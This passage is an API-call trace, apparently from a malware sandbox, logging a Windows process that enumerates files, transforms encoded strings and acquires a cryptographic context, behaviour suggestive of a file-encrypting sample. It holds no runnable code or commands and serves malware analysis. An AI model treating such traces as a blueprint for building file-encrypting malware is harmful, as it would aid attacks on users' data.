dwReserved1=0x0, cFileName="V7-K_kNP-.pptx", cAlternateFileName="V7-K_K~1.PPT")) returned 0x9e20b8 [0151.786] FindClose (in: hFindFile=0x9e20b8 | out: hFindFile=0x9e20b8) returned 1 [0151.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0151.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0151.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0151.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0151.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0151.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0151.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0151.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0151.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0151.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0151.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0151.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0151.788] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0151.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0151.788] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0151.788] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.788] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0151.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0151.789] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0151.789] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.789] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.789] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0151.789] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.789] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0151.789] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0151.790] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.790] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0151.790] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.790] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.791] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0151.791] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.791] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.791] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0151.791] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0151.791] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0151.791] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.792] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.792] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.792] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0151.792] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0151.792] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.792] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.792] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0151.792] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.792] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0151.792] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0151.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0151.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7220, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0151.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0151.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7220, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0151.793] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bee68) returned 1 [0151.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.793] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0151.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.793] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0151.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.793] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.794] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0151.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.794] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0151.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.794] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0151.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.794] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0151.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.795] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0151.795] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.795] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0151.795] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.795] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.808] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.808] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.808] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: 